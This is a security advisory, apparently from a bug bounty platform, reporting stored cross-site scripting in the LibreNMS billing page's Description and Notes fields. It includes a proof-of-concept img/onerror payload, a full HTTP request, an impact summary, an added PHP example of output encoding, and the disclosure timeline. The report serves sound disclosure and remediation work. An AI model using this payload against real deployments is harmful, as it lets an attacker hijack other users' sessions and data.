librenms bills Description & Notes Stored XSS in librenms/librenms
Valid
Reported on
Apr 12th 2022
Proof of Concept
- Log in
- Go to http://[librenms]/bills
- Click Create Bill
- Add Description or Notes ["<img src=x onerror=alert(1);>"]
// PoC.js
POST /bills/ HTTP/1.1
Host: 192.168.0.4
Connection: keep-alive
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: SERVER
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: SERVER/bills
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ik5Uek0vZm92NEZkRFI5WVJBd281aVE9PSIsInZhbHVlIjoiRlZ6UEx5V3hlc1NqMlUxMkhCU0Vhb21vVHNWVXhBZnMzZkk1blRVZVEycllXTVNTTFdRVzN1akN5eEw4OVFNYXZvM2Mxd1NpeFl6MHk3UEhSSUxraTBUbWkxMkVHMXc3ZHpaaUtkMHVuQ1dWS203V3Vka3BlMWJBOEpmSGdJWGEiLCJtYWMiOiI2ZGRmYjEwNGRiNjBmNjgwNjBkYmFlNzBmYTM5MWY5OTBhM2FjN2ZjY2E1ZTdiZDQ0Y2ViMmVlMGMxYjBiOTA0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZTNlBZc05YdTc5cUE5cTBObmFCb0E9PSIsInZhbHVlIjoiaklYUE94bGNRWC9oYll2VW9oVHhwZlh2aEdQR29rdk00dTdXN1JUUS9JMHNMZHYrRGJMVnVGT3FnOVBZQU04NW9peWl6amgzM0NVcDNFVVNCTC9rRlVIV0JlejRwRGh1bDl3K1lENHRDNFNRVlUxTElGMDVsbmlWS3pBeGo1WWQiLCJtYWMiOiIyZjY5N2IzNTFkODBmY2U1ZTRhODc5ZTMyOTI3ZDQ0NjdlMTVjYzEyMTlhZmQ2N2IzODlkMmVjMTQyZDFlNDBmIiwidGFnIjoiIn0%3D

_token=lTMObTvhduJCjTDkvmk1I3u4Vuti8C0OGafrlL8J&addbill=yes&device=-1&bill_name=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22&bill_type=cdr&bill_cdr=&bill_cdr_type=Mbps&dir_95th=in&bill_quota=&bill_quota_type=GB&bill_day=1&bill_custid=&bill_ref=&bill_notes=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22
Impact
It allows an attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
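The following is an added illustration, not code from the report or from LibreNMS: it decodes the `bill_name` and `bill_notes` fields from the PoC body and renders them once without and once with HTML output encoding. The function names and the table-row markup are assumptions made for the example.

```php
<?php
// Added illustration; not LibreNMS code. Function names and markup are hypothetical.

// Constructed sample: the two attacker-controlled fields from the PoC request body.
$body = 'bill_name=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22'
      . '&bill_notes=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22';
parse_str($body, $bill); // URL-decoded values, as they would be stored

// Vulnerable pattern: stored values are concatenated into HTML as-is.
function render_bill_unsafe(array $bill): string
{
    return '<tr><td>' . $bill['bill_name'] . '</td><td>'
         . $bill['bill_notes'] . '</td></tr>';
}

// Hardened pattern: encode for the HTML context at output time.
function e_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_bill_safe(array $bill): string
{
    return '<tr><td>' . e_html($bill['bill_name']) . '</td><td>'
         . e_html($bill['bill_notes']) . '</td></tr>';
}

// Regression check: count the start tags a browser would parse.
// Only the template's own tr/td tags should survive in the safe rendering.
function count_start_tags(string $html): int
{
    return (int) preg_match_all('/<[a-zA-Z]/', $html);
}

$unsafe = render_bill_unsafe($bill);
$safe   = render_bill_safe($bill);

printf("unsafe: %d start tags\n%s\n\n", count_start_tags($unsafe), $unsafe);
printf("safe:   %d start tags\n%s\n", count_start_tags($safe), $safe);
```

In Laravel Blade templates, `{{ $value }}` applies this encoding and `{!! $value !!}` does not.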
We are processing your report and will contact the librenms team within 24 hours.
a year ago
dnr6419 modified the report
a year ago
We have contacted a member of the librenms team and are waiting to hear back
a year ago
We have sent a follow up to the librenms team. We will try again in 7 days.
a year ago
We have sent a second follow up to the librenms team. We will try again in 10 days.
a year ago
We have sent a third and final follow up to the librenms team. This report is now considered stale.
a year ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE